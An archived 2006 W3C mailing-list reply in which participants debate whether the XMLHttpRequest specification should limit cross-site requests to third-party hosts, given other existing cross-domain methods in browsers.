W3C home > Mailing lists > Public > public-webapi@w3.org > April 2006

Re: several messages

From: Jim Ley <jim@jibbering.com>
Date: Tue, 18 Apr 2006 22:50:17 +0100
Message-ID: <00e001c66332$15b95560$817ba8c0@Snufkin>
To: <public-webapi@w3.org>

"Ian Hickson" <ian@hixie.ch>
> On Tue, 18 Apr 2006, Ian Davis wrote:
>>
>> Those are interesting ideas but my proposal is specifically to limit the
>> scope of which 3rd party hosts can be accessed by the XHR object. Why is
>> that out of scope?
>
> Well, it seems you'd want all the restrictions in one place, rather than
> have restriction policies for each feature specced out separately. Also,
> it would be very strange to restrict XHR while not restricting the dozens
> of other ways of doing cross-site communication -- if what you're trying
> to do is leak information, you don't care whether you're using cross-site
> XMLHttpRequest or an older system (indeed, the older the better, as it'll
> work with more browsers).

The other leaking methods are not part of a standard - there's no standard 
that says a UA must allow cross domain form posts (indeed the majority offer 
such a warning and the ability to deny it), there's no standard that says a 
UA must allow cross domain image access, again most UAs offer a mechanism to 
block these.

Standardising something which would require it to be allowed is a different 
matter than simply pointing out that current behaviour in UAs is such that 
it's possible.

Jim. 
Received on Tuesday, 18 April 2006 21:51:53 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Tuesday, 8 January 2008 14:18:54 GMT